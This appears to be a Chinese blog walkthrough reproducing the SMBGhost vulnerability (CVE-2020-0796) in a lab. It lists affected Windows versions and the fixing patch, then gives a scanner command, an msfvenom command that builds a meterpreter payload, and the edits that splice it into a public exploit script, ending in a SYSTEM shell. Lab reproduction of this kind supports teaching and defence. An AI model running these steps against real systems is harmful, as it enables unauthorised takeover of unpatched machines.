CVE-2020-0796“永恒之黑”漏洞复现

永恒之黑是2020年报出来的Windows10的系统漏洞
受影响的版本:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
补丁:
KB4551762
如果你的Windows系统版本是以上版本,可以打开命令提示符窗口输入systeminfo,在修补程序下寻找是否下载了该补丁。
如果没有该补丁请到这里下载
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4551762

环境简绍

Windows10 1903 x64虚拟机,具有永恒之黑漏洞(安装有Python)
kali虚拟机(装有msf工具)

前期准备

下载Python脚本
漏洞检测脚本:https://github.com/ollypwn/SMBGhost/blob/master/scanner.py
漏洞利用脚本:
https://github.com/

Windows10漏洞测试

将测试脚本拷贝到win10虚拟机上,打开命令提示符窗口切换到脚本所在的路径用命令运行:python cve-2020-0796-scanner.py -t ip
这里ip要填写win10的ip地址
CVE-2020-0796“永恒之黑”漏洞复现_第1张图片
看到这个说明漏洞存在且可以被利用。

漏洞利用

打开kali虚拟机,将下载好的漏洞利用脚本整个文件夹拷贝到kali虚拟机上
CVE-2020-0796“永恒之黑”漏洞复现_第2张图片
此目录下exploit.py就是我们要用到的脚本,首先要将该脚本做一个备份,因为后续要改脚本中的内容,如果出错还得从外面拷进来。
利用msf的工具生成反弹shell脚本,命令为:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python
CVE-2020-0796“永恒之黑”漏洞复现_第3张图片
如图所示中的内容,我们需要拷贝buf的所有内容替换exploit.py中的USER_PAYLOAD中的所有内容
CVE-2020-0796“永恒之黑”漏洞复现_第4张图片
拷贝
vim exploit.py
CVE-2020-0796“永恒之黑”漏洞复现_第5张图片
替换掉这些内容,再将所有的buf替换成USER_PAYLOAD,vim命令如下:
:91,133 s/buf/USER_PAYLOAD/g
CVE-2020-0796“永恒之黑”漏洞复现_第6张图片

启动msf

CVE-2020-0796“永恒之黑”漏洞复现_第7张图片
如图所示进行设置,run开始攻击,等待反弹shell,打开另一个窗口运行刚刚修改后的exploit.py脚本
CVE-2020-0796“永恒之黑”漏洞复现_第8张图片
此时可以看到在第一个窗口中已经攻击成功了,输入shell回车就拿到了window系统的最高权限system32
CVE-2020-0796“永恒之黑”漏洞复现_第9张图片
在这里我们就可以对windows10系统“为所欲为”了,例如在屏幕上创建一个关机脚本
在这里插入图片描述
CVE-2020-0796“永恒之黑”漏洞复现_第10张图片
双击脚本30秒自动关机

漏洞复现完成,谢谢观看,大家如有什么疑问或者哪一步卡住了请留言。

你可能感兴趣的:(网络安全,windows,shell,安全)